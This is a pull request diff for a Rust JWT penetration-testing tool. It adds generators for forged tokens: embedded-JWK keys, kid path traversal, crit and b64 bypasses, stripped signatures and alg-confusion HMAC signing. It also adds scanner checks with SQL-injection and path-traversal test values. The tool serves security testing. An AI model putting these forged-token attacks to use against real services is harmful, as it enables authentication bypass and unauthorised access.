### PR TITLE
feat: expand JWT attack coverage (jwk-embed, kid traversal, crit/b64, PII)

### DIFF
--- a/src/cmd/mcp.rs
+++ b/src/cmd/mcp.rs
@@ -134,6 +134,9 @@ fn default_protocol() -> String {
 
 #[derive(Clone)]
 pub struct JwtHackServer {
+    // Populated by the #[tool_router] macro and consumed by rmcp internally;
+    // direct reads don't appear in this file.
+    #[allow(dead_code)]
     tool_router: ToolRouter<JwtHackServer>,
 }
 

--- a/src/cmd/mod.rs
+++ b/src/cmd/mod.rs
@@ -157,7 +157,7 @@ pub enum Commands {
         #[arg(long, default_value = "https")]
         jwk_protocol: String,
 
-        /// Target payload types (comma-separated: all,none,jku,x5u,alg_confusion,kid_sql,x5c,cty)
+        /// Target payload types (comma-separated: all,none,jku,x5u,alg_confusion,kid_sql,kid_traversal,x5c,cty,jwk_embed,crit,b64,empty_sig)
         #[arg(long, default_value = "all")]
         target: Option<String>,
     },

--- a/src/cmd/payload.rs
+++ b/src/cmd/payload.rs
@@ -54,8 +54,13 @@ fn generate_payloads(
         "x5u",
         "alg_confusion",
         "kid_sql",
+        "kid_traversal",
         "x5c",
         "cty",
+        "jwk_embed",
+        "crit",
+        "b64",
+        "empty_sig",
     ];
     for t in &targets {
         if !valid_targets.contains(&t.as_str()) && t != "all" {
@@ -127,6 +132,59 @@ fn generate_payloads(
         if let Ok(payloads) = crate::payload::generate_cty_payload(token) {
             for payload in payloads {
                 println!("\n  {}", "cty Header Manipulation".bold());
+                println!("  {payload}");
+            }
+        }
+    }
+
+    // Generate embedded-JWK header attack payload (real signed token)
+    if should_generate_all || targets.contains("jwk_embed") {
+        match crate::payload::generate_jwk_embed_payload(token) {
+            Ok(payload) => {
+                println!("\n  {}", "jwk Embedded Header (signed)".bold());
+                println!("  {payload}");
+            }
+            Err(e) => {
+                utils::log_warning(format!("Failed to generate jwk_embed payload: {e}"));
+            }
+        }
+    }
+
+    // Generate kid path-traversal payloads
+    if should_generate_all || targets.contains("kid_traversal") {
+        if let Ok(payloads) = crate::payload::generate_kid_traversal_payload(token) {
+            for payload in payloads {
+                println!("\n  {}", "kid Path Traversal".bold());
+                println!("  {payload}");
+            }
+        }
+    }
+
+    // Generate crit header bypass payloads
+    if should_generate_all || targets.contains("crit") {
+        if let Ok(payloads) = crate::payload::generate_crit_payload(token) {
+            for payload in payloads {
+                println!("\n  {}", "crit Header Bypass".bold());
+                println!("  {payload}");
+            }
+        }
+    }
+
+    // Generate RFC 7797 b64=false payloads
+    if should_generate_all || targets.contains("b64") {
+        if let Ok(payloads) = crate::payload::generate_b64_payload(token) {
+            for payload in payloads {
+                println!("\n  {}", "b64=false (RFC 7797)".bold());
+                println!("  {payload}");
+            }
+        }
+    }
+
+    // Generate signature-stripped payloads
+    if should_generate_all || targets.contains("empty_sig") {
+        if let Ok(payloads) = crate::payload::generate_empty_sig_payload(token) {
+            for payload in payloads {
+                println!("\n  {}", "Empty/Stripped Signature".bold());
                 println!("  {payload}");
             }
         }

--- a/src/cmd/scan.rs
+++ b/src/cmd/scan.rs
@@ -132,6 +132,21 @@ fn run_scan(token: &str, options: &ScanOptions) -> Result<()> {
     // Check 7: JKU/X5U Header Vulnerabilities
     results.push(check_jku_x5u_vulnerabilities(&decoded)?);
 
+    // Check 8: Embedded JWK Header
+    results.push(check_jwk_header(&decoded)?);
+
+    // Check 9: crit Header
+    results.push(check_crit_header(&decoded)?);
+
+    // Check 10: RFC 7797 b64 Header
+    results.push(check_b64_header(&decoded)?);
+
+    // Check 11: Empty / suspicious signature
+    results.push(check_signature_segment(token, &decoded)?);
+
+    // Check 12: Sensitive claim data (PII)
+    results.push(check_sensitive_claims(&decoded)?);
+
     // Display results summary
     display_results(&results);
 
@@ -364,22 +379,303 @@ fn check_missing_claims(decoded: &jwt::DecodedToken) -> Result<VulnerabilityResu
 
 /// Check for kid header vulnerabilities
 fn check_kid_vulnerabilities(decoded: &jwt::DecodedToken) -> Result<VulnerabilityResult> {
-    let result = if let Some(kid) = decoded.header.get("kid") {
-        VulnerabilityResult {
-            name: "Kid Header".to_string(),
-            vulnerable: true,
-            details: format!("Has 'kid' header ({}), may be vulnerable to injection", kid),
-            severity: Severity::Medium,
-        }
-    } else {
-        VulnerabilityResult {
+    let result = match decoded.header.get("kid") {
+        None => VulnerabilityResult {
             name: "Kid Header".to_string(),
             vulnerable: false,
             details: "No 'kid' header".to_string(),
             severity: Severity::Info,
+        },
+        Some(kid_value) => {
+            let kid_str = kid_value.as_str().unwrap_or("").to_string();
+            let lower = kid_str.to_lowercase();
+
+            let looks_like_path = lower.contains("..")
+                || lower.starts_with('/')
+                || lower.starts_with("file:")
+                || lower.contains('\\')
+                || kid_str.contains('\0');
+            let looks_like_sqli = kid_str.contains('\'')
+                || lower.contains(" or ")
+                || lower.contains(" union ")
+                || lower.contains("--");
+
+            let (severity, details) = if looks_like_path {
+                (
+                    Severity::High,
+                    format!(
+                        "'kid' value '{}' resembles a file path — possible path traversal / file load",
+                        kid_str
+                    ),
+                )
+            } else if looks_like_sqli {
+                (
+                    Severity::High,
+                    format!(
+                        "'kid' value '{}' contains SQL meta-characters — possible SQL injection",
+                        kid_str
+                    ),
+                )
+            } else {
+                (
+                    Severity::Medium,
+                    format!(
+                        "Has 'kid' header ('{}') — test for injection (SQLi, path traversal)",
+                        kid_str
+                    ),
+                )
+            };
+
+            VulnerabilityResult {
+                name: "Kid Header".to_string(),
+                vulnerable: true,
+                details,
+                severity,
+            }
         }
     };
 
+    Ok(result)
+}
+
+/// Check for an embedded `jwk` header (attacker can substitute their key).
+fn check_jwk_header(decoded: &jwt::DecodedToken) -> Result<VulnerabilityResult> {
+    let result = if decoded.header.contains_key("jwk") {
+        VulnerabilityResult {
+            name: "Embedded JWK".to_string(),
+            vulnerable: true,
+            details: "Header contains an embedded 'jwk' — verifiers that trust it accept attacker-supplied keys".to_string(),
+            severity: Severity::Critical,
+        }
+    } else {
+        VulnerabilityResult {
+            name: "Embedded JWK".to_string(),
+            vulnerable: false,
+            details: "No embedded 'jwk' header".to_string(),
+            severity: Severity::Info,
+        }
+    };
+    Ok(result)
+}
+
+/// Check for `crit` header (RFC 7515 §4.1.11) misuse.
+fn check_crit_header(decoded: &jwt::DecodedToken) -> Result<VulnerabilityResult> {
+    let result = if let Some(crit) = decoded.header.get("crit") {
+        VulnerabilityResult {
+            name: "crit Header".to_string(),
+            vulnerable: true,
+            details: format!(
+                "Has 'crit' header ({}) — libraries that don't strictly enforce RFC 7515 §4.1.11 may skip validation",
+                crit
+            ),
+            severity: Severity::High,
+        }
+    } else {
+        VulnerabilityResult {
+            name: "crit Header".to_string(),
+            vulnerable: false,
+            details: "No 'crit' header".to_string(),
+            severity: Severity::Info,
+        }
+    };
+    Ok(result)
+}
+
+/// Check for RFC 7797 `b64: false` (unencoded payload).
+fn check_b64_header(decoded: &jwt::DecodedToken) -> Result<VulnerabilityResult> {
+    let result = match decoded.header.get("b64") {
+        Some(v) if v.as_bool() == Some(false) => VulnerabilityResult {
+            name: "b64 Header (RFC 7797)".to_string(),
+            vulnerable: true,
+            details:
+                "Header sets 'b64' to false — implementations that mishandle this may accept unsigned/forged payloads"
+                    .to_string(),
+            severity: Severity::High,
+        },
+        Some(v) => VulnerabilityResult {
+            name: "b64 Header (RFC 7797)".to_string(),
+            vulnerable: true,
+            details: format!("Non-standard 'b64' header value: {}", v),
+            severity: Severity::Medium,
+        },
+        None => VulnerabilityResult {
+            name: "b64 Header (RFC 7797)".to_string(),
+            vulnerable: false,
+            details: "No 'b64' header".to_string(),
+            severity: Severity::Info,
+        },
+    };
+    Ok(result)
+}
+
+/// Check for an empty / suspiciously short signature segment.
+fn check_signature_segment(
+    token: &str,
+    decoded: &jwt::DecodedToken,
+) -> Result<VulnerabilityResult> {
+    let parts: Vec<&str> = token.split('.').collect();
+    let alg_str = format!("{:?}", decoded.algorithm).to_lowercase();
+    let header_alg = decoded
+        .header
+        .get("alg")
+        .and_then(|v| v.as_str())
+        .map(|s| s.to_lowercase())
+        .unwrap_or_default();
+    let is_none = alg_str.contains("none") || header_alg == "none";
+
+    let sig = parts.get(2).copied().unwrap_or("");
+    // The encoder writes `''` for the none-alg sentinel; treat that as empty too.
+    let sig_trim = sig.trim_matches('\'');
+    let is_empty = sig_trim.is_empty();
+
+    let result = if is_empty && !is_none {
+        VulnerabilityResult {
+            name: "Signature Segment".to_string(),
+            vulnerable: true,
+            details: format!(
+                "Signature is empty but 'alg' is '{}' — server may accept unsigned tokens",
+                header_alg
+            ),
+            severity: Severity::Critical,
+        }
+    } else if parts.len() != 3 {
+        VulnerabilityResult {
+            name: "Signature Segment".to_string(),
+            vulnerable: true,
+            details: format!("Unexpected segment count: {}", parts.len()),
+            severity: Severity::High,
+        }
+    } else {
+        VulnerabilityResult {
+            name: "Signature Segment".to_string(),
+            vulnerable: false,
+            details: "Signature segment present".to_string(),
+            severity: Severity::Info,
+        }
+    };
+    Ok(result)
+}
+
+/// Heuristically detect PII / sensitive data inside the claims.
+fn check_sensitive_claims(decoded: &jwt::DecodedToken) -> Result<VulnerabilityResult> {
+    fn looks_like_email(s: &str) -> bool {
+        // Minimal email shape: x@y.z with no spaces.
+        if s.len() < 5 || s.contains(' ') {
+            return false;
+        }
+        let Some(at) = s.find('@') else {
+            return false;
+        };
+        let (local, domain) = s.split_at(at);
+        if local.is_empty() {
+            return false;
+        }
+        let domain = &domain[1..];
+        domain.contains('.') && !domain.starts_with('.') && !domain.ends_with('.')
+    }
+
+    fn looks_like_credit_card(s: &str) -> bool {
+        let digits: Vec<u32> = s
+            .chars()
+            .filter(|c| !c.is_whitespace() && *c != '-')
+            .filter_map(|c| c.to_digit(10))
+            .collect();
+        if !(12..=19).contains(&digits.len()) {
+            return false;
+        }
+        // Luhn check.
+        let mut sum = 0u32;
+        let mut alt = false;
+        for d in digits.iter().rev() {
+            let mut n = *d;
+            if alt {
+                n *= 2;
+                if n > 9 {
+                    n -= 9;
+                }
+            }
+            sum += n;
+            alt = !alt;
+        }
+        sum.is_multiple_of(10)
+    }
+
+    fn looks_like_ssn(s: &str) -> bool {
+        // US SSN: 3-2-4 digits, hyphenated.
+        let bytes = s.as_bytes();
+        if bytes.len() != 11 {
+            return false;
+        }
+        bytes[3] == b'-'
+            && bytes[6] == b'-'
+            && bytes
+                .iter()
+                .enumerate()
+                .all(|(i, b)| matches!(i, 3 | 6) || b.is_ascii_digit())
+    }
+
+    fn walk(v: &serde_json::Value, findings: &mut Vec<String>, path: &str) {
+        match v {
+            serde_json::Value::String(s) => {
+                if looks_like_email(s) {
+                    findings.push(format!("email at '{}'", path));
+                } else if looks_like_credit_card(s) {
+                    findings.push(format!("credit-card-shaped value at '{}'", path));
+                } else if looks_like_ssn(s) {
+                    findings.push(format!("SSN-shaped value at '{}'", path));
+                }
+            }
+            serde_json::Value::Object(map) => {
+                for (k, child) in map {
+                    let next = if path.is_empty() {
+                        k.clone()
+                    } else {
+                        format!("{}.{}", path, k)
+                    };
+                    walk(child, findings, &next);
+                }
+            }
+            serde_json::Value::Array(arr) => {
+                for (i, child) in arr.iter().enumerate() {
+                    walk(child, findings, &format!("{}[{}]", path, i));
+                }
+            }
+            _ => {}
+        }
+    }
+
+    let mut findings = Vec::new();
+    walk(&decoded.claims, &mut findings, "");
+
+    let result = if findings.is_empty() {
+        VulnerabilityResult {
+            name: "Sensitive Claims".to_string(),
+            vulnerable: false,
+            details: "No obvious PII patterns in claims".to_string(),
+            severity: Severity::Info,
+        }
+    } else {
+        // De-duplicate and cap output.
+        findings.sort();
+        findings.dedup();
+        let shown = findings
+            .iter()
+            .take(5)
+            .cloned()
+            .collect::<Vec<_>>()
+            .join(", ");
+        let suffix = if findings.len() > 5 {
+            format!(" (+{} more)", findings.len() - 5)
+        } else {
+            String::new()
+        };
+        VulnerabilityResult {
+            name: "Sensitive Claims".to_string(),
+            vulnerable: true,
+            details: format!("Found PII-like data: {}{}", shown, suffix),
+            severity: Severity::Medium,
+        }
+    };
     Ok(result)
 }
 
@@ -497,10 +793,23 @@ fn generate_attack_payloads(token: &str, results: &[VulnerabilityResult]) -> Res
             }
             "Kid Header" => {
                 targets.insert("kid_sql");
+                targets.insert("kid_traversal");
             }
             "JKU/X5U Header" => {
                 targets.insert("jku");
                 targets.insert("x5u");
+            }
+            "Embedded JWK" => {
+                targets.insert("jwk_embed");
+            }
+            "crit Header" => {
+                targets.insert("crit");
+            }
+            "b64 Header (RFC 7797)" => {
+                targets.insert("b64");
+            }
+            "Signature Segment" => {
+                targets.insert("empty_sig");
             }
             _ => {}
         }
@@ -533,6 +842,44 @@ fn generate_attack_payloads(token: &str, results: &[VulnerabilityResult]) -> Res
 
             if target_str.contains("kid_sql") {
                 if let Ok(payloads) = payload::generate_kid_sql_payload(token) {
+                    for p in payloads.iter().take(2) {
+                        println!("  {}", p);
+                    }
+                }
+            }
+
+            if target_str.contains("kid_traversal") {
+                if let Ok(payloads) = payload::generate_kid_traversal_payload(token) {
+                    for p in payloads.iter().take(2) {
+                        println!("  {}", p);
+                    }
+                }
+            }
+
+            if target_str.contains("jwk_embed") {
+                if let Ok(p) = payload::generate_jwk_embed_payload(token) {
+                    println!("  {}", p);
+                }
+            }
+
+            if target_str.contains("crit") {
+                if let Ok(payloads) = payload::generate_crit_payload(token) {
+                    for p in payloads.iter().take(2) {
+                        println!("  {}", p);
+                    }
+                }
+            }
+
+            if target_str.contains("b64") {
+                if let Ok(payloads) = payload::generate_b64_payload(token) {
+                    for p in payloads.iter().take(2) {
+                        println!("  {}", p);
+                    }
+                }
+            }
+
+            if target_str.contains("empty_sig") {
+                if let Ok(payloads) = payload::generate_empty_sig_payload(token) {
                     for p in payloads.iter().take(2) {
                         println!("  {}", p);
                     }

--- a/src/cmd/scan.rs
+++ b/src/cmd/scan.rs
@@ -483,23 +483,31 @@ fn check_crit_header(decoded: &jwt::DecodedToken) -> Result<VulnerabilityResult>
 
 /// Check for RFC 7797 `b64: false` (unencoded payload).
 fn check_b64_header(decoded: &jwt::DecodedToken) -> Result<VulnerabilityResult> {
+    let name = "b64 Header (RFC 7797)".to_string();
     let result = match decoded.header.get("b64") {
         Some(v) if v.as_bool() == Some(false) => VulnerabilityResult {
-            name: "b64 Header (RFC 7797)".to_string(),
+            name,
             vulnerable: true,
             details:
                 "Header sets 'b64' to false — implementations that mishandle this may accept unsigned/forged payloads"
                     .to_string(),
             severity: Severity::High,
         },
+        Some(v) if v.as_bool() == Some(true) => VulnerabilityResult {
+            // b64:true is the RFC default; explicit but harmless.
+            name,
+            vulnerable: false,
+            details: "'b64' header is true (RFC default)".to_string(),
+            severity: Severity::Info,
+        },
         Some(v) => VulnerabilityResult {
-            name: "b64 Header (RFC 7797)".to_string(),
+            name,
             vulnerable: true,
             details: format!("Non-standard 'b64' header value: {}", v),
             severity: Severity::Medium,
         },
         None => VulnerabilityResult {
-            name: "b64 Header (RFC 7797)".to_string(),
+            name,
             vulnerable: false,
             details: "No 'b64' header".to_string(),
             severity: Severity::Info,
@@ -575,11 +583,24 @@ fn check_sensitive_claims(decoded: &jwt::DecodedToken) -> Result<VulnerabilityRe
     }
 
     fn looks_like_credit_card(s: &str) -> bool {
-        let digits: Vec<u32> = s
+        // Reject strings that are mostly non-digit text — order IDs, JWT IDs,
+        // hex hashes can otherwise sneak through Luhn by coincidence.
+        let total = s.chars().count();
+        if total == 0 {
+            return false;
+        }
+        let digit_count = s.chars().filter(|c| c.is_ascii_digit()).count();
+        // Allow only digits, ASCII whitespace, and '-' separators in CC-shaped strings.
+        let allowed = s
             .chars()
-            .filter(|c| !c.is_whitespace() && *c != '-')
-            .filter_map(|c| c.to_digit(10))
-            .collect();
+            .all(|c| c.is_ascii_digit() || c.is_ascii_whitespace() || c == '-');
+        if !allowed {
+            return false;
+        }
+        if (digit_count as f64) / (total as f64) < 0.7 {
+            return false;
+        }
+        let digits: Vec<u32> = s.chars().filter_map(|c| c.to_digit(10)).collect();
         if !(12..=19).contains(&digits.len()) {
             return false;
         }
@@ -1042,5 +1063,158 @@ mod tests {
         assert!(result.vulnerable);
         assert_eq!(result.name, "None Algorithm");
         assert_eq!(result.severity, Severity::Critical);
+    }
+
+    /// Build a synthetic token whose header carries the given extra fields and
+    /// whose claims are the supplied JSON value. The signature is junk — these
+    /// helpers feed checks that only look at parsed header/claims, never verify.
+    fn synthetic_token(extra_header: serde_json::Value, claims: serde_json::Value) -> String {
+        use base64::Engine;
+        let mut header = json!({ "alg": "HS256", "typ": "JWT" });
+        if let Some(map) = extra_header.as_object() {
+            for (k, v) in map {
+                header[k] = v.clone();
+            }
+        }
+        let header_b64 = base64::engine::general_purpose::URL_SAFE_NO_PAD
+            .encode(serde_json::to_string(&header).unwrap().as_bytes());
+        let claims_b64 = base64::engine::general_purpose::URL_SAFE_NO_PAD
+            .encode(serde_json::to_string(&claims).unwrap().as_bytes());
+        format!("{header_b64}.{claims_b64}.fake")
+    }
+
+    #[test]
+    fn test_check_b64_header_false_is_high() {
+        let token = synthetic_token(json!({ "b64": false }), json!({}));
+        let decoded = jwt::decode(&token).unwrap();
+        let r = check_b64_header(&decoded).unwrap();
+        assert!(r.vulnerable);
+        assert_eq!(r.severity, Severity::High);
+    }
+
+    #[test]
+    fn test_check_b64_header_true_is_info() {
+        // b64:true is the RFC default — must not be reported as a vulnerability.
+        let token = synthetic_token(json!({ "b64": true }), json!({}));
+        let decoded = jwt::decode(&token).unwrap();
+        let r = check_b64_header(&decoded).unwrap();
+        assert!(!r.vulnerable);
+        assert_eq!(r.severity, Severity::Info);
+    }
+
+    #[test]
+    fn test_check_b64_header_missing_is_info() {
+        let token = synthetic_token(json!({}), json!({}));
+        let decoded = jwt::decode(&token).unwrap();
+        let r = check_b64_header(&decoded).unwrap();
+        assert!(!r.vulnerable);
+        assert_eq!(r.severity, Severity::Info);
+    }
+
+    #[test]
+    fn test_check_jwk_header_detects_embedded_jwk() {
+        let token = synthetic_token(
+            json!({ "jwk": { "kty": "RSA", "n": "x", "e": "AQAB" } }),
+            json!({}),
+        );
+        let decoded = jwt::decode(&token).unwrap();
+        let r = check_jwk_header(&decoded).unwrap();
+        assert!(r.vulnerable);
+        assert_eq!(r.severity, Severity::Critical);
+    }
+
+    #[test]
+    fn test_check_crit_header_present() {
+        let token = synthetic_token(json!({ "crit": ["b64"] }), json!({}));
+        let decoded = jwt::decode(&token).unwrap();
+        let r = check_crit_header(&decoded).unwrap();
+        assert!(r.vulnerable);
+        assert_eq!(r.severity, Severity::High);
+    }
+
+    #[test]
+    fn test_check_kid_header_classifies_path_traversal() {
+        let token = synthetic_token(json!({ "kid": "../../../../dev/null" }), json!({}));
+        let decoded = jwt::decode(&token).unwrap();
+        let r = check_kid_vulnerabilities(&decoded).unwrap();
+        assert!(r.vulnerable);
+        assert_eq!(r.severity, Severity::High);
+        assert!(r.details.contains("path"));
+    }
+
+    #[test]
+    fn test_check_kid_header_classifies_sqli() {
+        let token = synthetic_token(json!({ "kid": "x' UNION SELECT 1 --" }), json!({}));
+        let decoded = jwt::decode(&token).unwrap();
+        let r = check_kid_vulnerabilities(&decoded).unwrap();
+        assert!(r.vulnerable);
+        assert_eq!(r.severity, Severity::High);
+        assert!(r.details.to_lowercase().contains("sql"));
+    }
+
+    #[test]
+    fn test_check_kid_header_plain_value_is_medium() {
+        let token = synthetic_token(json!({ "kid": "my-signing-key-2024" }), json!({}));
+        let decoded = jwt::decode(&token).unwrap();
+        let r = check_kid_vulnerabilities(&decoded).unwrap();
+        assert_eq!(r.severity, Severity::Medium);
+    }
+
+    #[test]
+    fn test_check_signature_segment_empty_with_alg_is_critical() {
+        // Build header.payload. (empty third segment) with alg=HS256.
+        use base64::Engine;
+        let header_b64 = base64::engine::general_purpose::URL_SAFE_NO_PAD
+            .encode(r#"{"alg":"HS256","typ":"JWT"}"#.as_bytes());
+        let claims_b64 =
+            base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(r#"{"sub":"x"}"#.as_bytes());
+        let token = format!("{header_b64}.{claims_b64}.");
+        let decoded = jwt::decode(&token).unwrap();
+        let r = check_signature_segment(&token, &decoded).unwrap();
+        assert!(r.vulnerable);
+        assert_eq!(r.severity, Severity::Critical);
+    }
+
+    #[test]
+    fn test_check_sensitive_claims_finds_pii() {
+        // Valid Luhn CC: 4539148803436467
+        let claims = json!({
+            "sub": "u1",
+            "email": "alice@example.com",
+            "cc": "4539148803436467",
+            "ssn": "078-05-1120",
+        });
+        let token = synthetic_token(json!({}), claims);
+        let decoded = jwt::decode(&token).unwrap();
+        let r = check_sensitive_claims(&decoded).unwrap();
+        assert!(r.vulnerable);
+        assert_eq!(r.severity, Severity::Medium);
+        assert!(r.details.contains("email at 'email'"));
+        assert!(r.details.contains("credit-card-shaped value at 'cc'"));
+        assert!(r.details.contains("SSN-shaped value at 'ssn'"));
+    }
+
+    #[test]
+    fn test_check_sensitive_claims_clean_token() {
+        let claims = json!({ "sub": "u1", "role": "admin", "iat": 1700000000 });
+        let token = synthetic_token(json!({}), claims);
+        let decoded = jwt::decode(&token).unwrap();
+        let r = check_sensitive_claims(&decoded).unwrap();
+        assert!(!r.vulnerable);
+    }
+
+    #[test]
+    fn test_check_sensitive_claims_rejects_alphanumeric_id() {
+        // 16 digits embedded in an order ID — must NOT be Luhn-tested as a CC
+        // because the string contains non-digit / non-separator characters.
+        // (4539148803436467 is Luhn-valid; bracketed by letters it must be ignored.)
+        let claims = json!({ "order": "ORD-4539148803436467-XYZ" });
+        let token = synthetic_token(json!({}), claims);
+        let decoded = jwt::decode(&token).unwrap();
+        let r = check_sensitive_claims(&decoded).unwrap();
+        assert!(
+            !r.vulnerable,
+            "alphanumeric IDs must not be classified as credit cards"
+        );
     }
 }

--- a/src/cmd/shell/mod.rs
+++ b/src/cmd/shell/mod.rs
@@ -301,15 +301,13 @@ fn handle_key_event(key: KeyEvent, app: &mut App, tx: &mpsc::Sender<AsyncResult>
             app.cursor_position = 0;
         }
         // Ctrl+W — delete word backward
-        (KeyModifiers::CONTROL, KeyCode::Char('w')) => {
-            if app.cursor_position > 0 {
-                let before = &app.input[..app.cursor_position];
-                let trimmed = before.trim_end();
-                let new_end = trimmed.rfind(' ').map(|i| i + 1).unwrap_or(0);
-                let after = &app.input[app.cursor_position..];
-                app.input = format!("{}{}", &app.input[..new_end], after);
-                app.cursor_position = new_end;
-            }
+        (KeyModifiers::CONTROL, KeyCode::Char('w')) if app.cursor_position > 0 => {
+            let before = &app.input[..app.cursor_position];
+            let trimmed = before.trim_end();
+            let new_end = trimmed.rfind(' ').map(|i| i + 1).unwrap_or(0);
+            let after = &app.input[app.cursor_position..];
+            app.input = format!("{}{}", &app.input[..new_end], after);
+            app.cursor_position = new_end;
         }
         // Enter — execute command
         (_, KeyCode::Enter) => {
@@ -354,16 +352,12 @@ fn handle_key_event(key: KeyEvent, app: &mut App, tx: &mpsc::Sender<AsyncResult>
             }
         },
         // Left arrow
-        (_, KeyCode::Left) => {
-            if app.cursor_position > 0 {
-                app.cursor_position -= 1;
-            }
+        (_, KeyCode::Left) if app.cursor_position > 0 => {
+            app.cursor_position -= 1;
         }
         // Right arrow
-        (_, KeyCode::Right) => {
-            if app.cursor_position < app.input.len() {
-                app.cursor_position += 1;
-            }
+        (_, KeyCode::Right) if app.cursor_position < app.input.len() => {
+            app.cursor_position += 1;
         }
         // Home
         (_, KeyCode::Home) => {
@@ -383,17 +377,13 @@ fn handle_key_event(key: KeyEvent, app: &mut App, tx: &mpsc::Sender<AsyncResult>
             app.scroll_offset += app.visible_height();
         }
         // Backspace
-        (_, KeyCode::Backspace) => {
-            if app.cursor_position > 0 {
-                app.input.remove(app.cursor_position - 1);
-                app.cursor_position -= 1;
-            }
+        (_, KeyCode::Backspace) if app.cursor_position > 0 => {
+            app.input.remove(app.cursor_position - 1);
+            app.cursor_position -= 1;
         }
         // Delete
-        (_, KeyCode::Delete) => {
-            if app.cursor_position < app.input.len() {
-                app.input.remove(app.cursor_position);
-            }
+        (_, KeyCode::Delete) if app.cursor_position < app.input.len() => {
+            app.input.remove(app.cursor_position);
         }
         // Character input
         (_, KeyCode::Char(c)) => {

--- a/src/payload/mod.rs
+++ b/src/payload/mod.rs
@@ -22,18 +22,18 @@ fn encode_header_with_claims(header: &serde_json::Value, claims_part: &str) -> R
 }
 
 /// Build a header.payload signing input from a header JSON value and an existing claims part.
-fn signing_input(header: &serde_json::Value, claims_part: &str) -> Result<String> {
+fn build_signing_input(header: &serde_json::Value, claims_part: &str) -> Result<String> {
     let header_json = serde_json::to_string(header)?;
     let encoded_header = general_purpose::URL_SAFE_NO_PAD.encode(header_json.as_bytes());
     Ok(format!("{encoded_header}.{claims_part}"))
 }
 
 /// Sign an arbitrary signing input with HS256 and return a JWT-formatted token (header.payload.sig).
-fn sign_hs256(signing_input: &str, secret: &[u8]) -> String {
-    let mut mac = hmac_sha256::HMAC::mac(signing_input.as_bytes(), secret);
+fn sign_hs256(input: &str, secret: &[u8]) -> String {
+    let mut mac = hmac_sha256::HMAC::mac(input.as_bytes(), secret);
     let sig_b64 = general_purpose::URL_SAFE_NO_PAD.encode(mac.as_slice());
     mac.zeroize();
-    format!("{signing_input}.{sig_b64}")
+    format!("{input}.{sig_b64}")
 }
 
 /// Read the original `alg` value from a JWT header (without verifying anything).
@@ -141,46 +141,39 @@ pub fn generate_alg_confusion_payload(
 
     let mut payloads = Vec::new();
 
-    // Header variants — HMAC downgrade and `none` downgrade.
-    let downgrade_algs = [hmac_target, "none"];
-    for alg in downgrade_algs {
-        let header = json!({
-            "alg": alg,
-            "typ": "JWT",
-        });
-        if let Some(pem) = public_key {
-            // Real working attack: sign with the public-key bytes as the HMAC secret.
-            // Only meaningful for HMAC downgrades; skip for `none`.
-            if alg != "none" {
-                let input = signing_input(&header, claims_part)?;
-                let mac = match alg {
-                    "HS256" => {
-                        let mut m = hmac_sha256::HMAC::mac(input.as_bytes(), pem.as_bytes());
-                        let out = m.to_vec();
-                        m.zeroize();
-                        out
-                    }
-                    _ => {
-                        // For HS384/HS512 fall back to the jsonwebtoken crate by
-                        // pretending the PEM bytes are an opaque secret.
-                        let algo = match alg {
-                            "HS384" => jsonwebtoken::Algorithm::HS384,
-                            _ => jsonwebtoken::Algorithm::HS512,
-                        };
-                        let key = jsonwebtoken::EncodingKey::from_secret(pem.as_bytes());
-                        let sig = jsonwebtoken::crypto::sign(input.as_bytes(), &key, algo)?;
-                        // jsonwebtoken returns base64-encoded signature already, decode to bytes
-                        general_purpose::URL_SAFE_NO_PAD.decode(sig.as_bytes())?
-                    }
-                };
-                let sig_b64 = general_purpose::URL_SAFE_NO_PAD.encode(&mac);
-                payloads.push(format!("{input}.{sig_b64}"));
-                continue;
-            }
+    // HMAC downgrade variant: signed with public-key bytes if provided, else
+    // emitted unsigned (header.payload only).
+    let hmac_header = json!({ "alg": hmac_target, "typ": "JWT" });
+    match public_key {
+        Some(pem) => {
+            let input = build_signing_input(&hmac_header, claims_part)?;
+            let sig_b64 = match hmac_target {
+                "HS256" => {
+                    let mut m = hmac_sha256::HMAC::mac(input.as_bytes(), pem.as_bytes());
+                    let out = general_purpose::URL_SAFE_NO_PAD.encode(m.as_slice());
+                    m.zeroize();
+                    out
+                }
+                other => {
+                    let algo = match other {
+                        "HS384" => jsonwebtoken::Algorithm::HS384,
+                        _ => jsonwebtoken::Algorithm::HS512,
+                    };
+                    let key = jsonwebtoken::EncodingKey::from_secret(pem.as_bytes());
+                    // jsonwebtoken returns the base64url-encoded signature directly.
+                    jsonwebtoken::crypto::sign(input.as_bytes(), &key, algo)?
+                }
+            };
+            payloads.push(format!("{input}.{sig_b64}"));
         }
-        // Fallback: emit header.payload without signature.
-        payloads.push(encode_header_with_claims(&header, claims_part)?);
+        None => {
+            payloads.push(encode_header_with_claims(&hmac_header, claims_part)?);
+        }
     }
+
+    // `none` downgrade — never signed regardless of public_key.
+    let none_header = json!({ "alg": "none", "typ": "JWT" });
+    payloads.push(encode_header_with_claims(&none_header, claims_part)?);
 
     info!(
         "Generated algorithm confusion payloads: {} -> {} (+none)",
@@ -228,7 +221,7 @@ pub fn generate_jwk_embed_payload(token: &str) -> Result<String> {
         "jwk": jwk,
     });
 
-    let input = signing_input(&header, claims_part)?;
+    let input = build_signing_input(&header, claims_part)?;
     let pem = private_key
         .to_pkcs8_pem(rsa::pkcs8::LineEnding::LF)
         .map_err(|e| anyhow::anyhow!("Failed to export private key: {}", e))?
@@ -272,7 +265,7 @@ pub fn generate_kid_traversal_payload(token: &str) -> Result<Vec<String>> {
             "typ": "JWT",
             "kid": kid,
         });
-        let input = signing_input(&header, claims_part)?;
+        let input = build_signing_input(&header, claims_part)?;
         payloads.push(sign_hs256(&input, secret));
     }
 
@@ -329,12 +322,8 @@ pub fn generate_b64_payload(token: &str) -> Result<Vec<String>> {
 /// algorithm is not explicitly `none`. The original header is preserved so
 /// the server still sees its expected `alg`.
 pub fn generate_empty_sig_payload(token: &str) -> Result<Vec<String>> {
-    let parts: Vec<&str> = token.split('.').collect();
-    if parts.len() < 2 {
-        return Err(anyhow::anyhow!("Invalid token format"));
-    }
-    let header_b64 = parts[0];
-    let claims_part = parts[1];
+    let claims_part = extract_claims_part(token)?;
+    let header_b64 = token.split('.').next().unwrap_or("");
 
     let payloads = vec![
         // Empty signature segment
@@ -968,6 +957,138 @@ mod tests {
                 }
             }
             false
+        }));
+    }
+
+    #[test]
+    fn test_generate_jwk_embed_payload_signature_verifies() {
+        // Generate the payload, then use the embedded public key to verify the signature.
+        let token = generate_jwk_embed_payload(DUMMY_TOKEN).expect("jwk_embed should succeed");
+        let parts: Vec<&str> = token.split('.').collect();
